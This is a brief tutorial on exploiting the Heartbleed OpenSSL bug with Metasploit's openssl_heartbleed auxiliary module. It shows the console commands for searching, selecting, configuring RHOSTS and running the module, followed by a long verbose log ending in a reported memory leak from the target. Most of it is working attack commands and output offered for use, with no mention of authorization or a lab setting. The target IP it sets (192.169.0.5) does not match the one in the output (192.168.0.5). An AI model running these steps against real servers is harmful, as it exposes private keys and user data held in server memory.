An simple tutorial how to exploit Heartbleed OpenSSL Bug using Metasploit

## Login to your Metasploit Framework

root@kali:~#msfconsole 

## Search the Heartbleed 

msf > search heartbleed

Matching Modules
================

   Name                                              Disclosure Date  Rank    Description
   ----                                              ---------------  ----    -----------
   auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       normal  OpenSSL Heartbeat (Heartbleed) Information Leak
   auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       normal  OpenSSL Heartbeat (Heartbleed) Client Memory Exposure

## Use the Heartbleed Auxiliary and run show options command

msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             443              yes       The target port
   STATUS_EVERY      5                yes       How many retries until status
   THREADS           1                yes       The number of concurrent threads
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)


Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability

## Set the RHOSTS with your target IP

msf auxiliary(openssl_heartbleed) > set RHOSTS 192.169.0.5
RHOSTS => 192.169.0.5

## Set verbose mode true

msf auxiliary(openssl_heartbleed) > set verbose true 
verbose => true

## Now exploit the target

msf auxiliary(openssl_heartbleed) > exploit

[*] 192.168.0.5:443   - Sending Client Hello...
[*] 192.168.0.5:443   - SSL record #1:
[*] 192.168.0.5:443   -     Type:    22
[*] 192.168.0.5:443   -     Version: 0x0301
[*] 192.168.0.5:443   -     Length:  86
[*] 192.168.0.5:443   -     Handshake #1:
[*] 192.168.0.5:443   -             Length: 82
[*] 192.168.0.5:443   -             Type:   Server Hello (2)
[*] 192.168.0.5:443   -             Server Hello Version:           0x0301
[*] 192.168.0.5:443   -             Server Hello random data:       57670028c2586feab7b89acb206737fb5a3c266668740367834100a7049f80c8
[*] 192.168.0.5:443   -             Server Hello Session ID length: 32
[*] 192.168.0.5:443   -             Server Hello Session ID:        34fd54aeab97d916e4b3fa0526dad8962efff7b19b22a15a94811d1730a08a94
[*] 192.168.0.5:443   - SSL record #2:
[*] 192.168.0.5:443   -     Type:    22
[*] 192.168.0.5:443   -     Version: 0x0301
[*] 192.168.0.5:443   -     Length:  5329
[*] 192.168.0.5:443   -     Handshake #1:
[*] 192.168.0.5:443   -             Length: 5325
[*] 192.168.0.5:443   -             Type:   Certificate Data (11)
[*] 192.168.0.5:443   -             Certificates length: 5322
[*] 192.168.0.5:443   -             Data length: 5325
[*] 192.168.0.5:443   -             Certificate #1:
[*] 192.168.0.5:443   -                     Certificate #1: Length: 1893
[*] 192.168.0.5:443   -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055eb028>, issuer=#<OpenSSL::X509::Name:0x000000055eb050>, serial=#<OpenSSL::BN:0x000000055eb078>, not_before=2015-10-07 02:26:39 UTC, not_after=2017-10-02 02:36:38 UTC>
[*] 192.168.0.5:443   -             Certificate #2:
[*] 192.168.0.5:443   -                     Certificate #2: Length: 1236
[*] 192.168.0.5:443   -                     Certificate #2: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055c8898>, issuer=#<OpenSSL::X509::Name:0x000000055c8938>, serial=#<OpenSSL::BN:0x000000055c8a28>, not_before=2011-05-03 07:00:00 UTC, not_after=2031-05-03 07:00:00 UTC>
[*] 192.168.0.5:443   -             Certificate #3:
[*] 192.168.0.5:443   -                     Certificate #3: Length: 1153
[*] 192.168.0.5:443   -                     Certificate #3: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000000055a6cc0>, issuer=#<OpenSSL::X509::Name:0x000000055a6ce8>, serial=#<OpenSSL::BN:0x000000055a6d10>, not_before=2014-01-01 07:00:00 UTC, not_after=2031-05-30 07:00:00 UTC>
[*] 192.168.0.5:443   -             Certificate #4:
[*] 192.168.0.5:443   -                     Certificate #4: Length: 1028
[*] 192.168.0.5:443   -                     Certificate #4: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x00000005589710>, issuer=#<OpenSSL::X509::Name:0x00000005589738>, serial=#<OpenSSL::BN:0x00000005589760>, not_before=2004-06-29 17:06:20 UTC, not_after=2034-06-29 17:06:20 UTC>
[*] 192.168.0.5:443   - SSL record #3:
[*] 192.168.0.5:443   -     Type:    22
[*] 192.168.0.5:443   -     Version: 0x0301
[*] 192.168.0.5:443   -     Length:  331
[*] 192.168.0.5:443   -     Handshake #1:
[*] 192.168.0.5:443   -             Length: 327
[*] 192.168.0.5:443   -             Type:   Server Key Exchange (12)
[*] 192.168.0.5:443   - SSL record #4:
[*] 192.168.0.5:443   -     Type:    22
[*] 192.168.0.5:443   -     Version: 0x0301
[*] 192.168.0.5:443   -     Length:  4
[*] 192.168.0.5:443   -     Handshake #1:
[*] 192.168.0.5:443   -             Length: 0
[*] 192.168.0.5:443   -             Type:   Server Hello Done (14)
[*] 192.168.0.5:443   - Sending Heartbeat...
[*] 192.168.0.5:443   - Heartbeat response, 65535 bytes
[+] 192.168.0.5:443   - Heartbeat response with leak

Thank you :)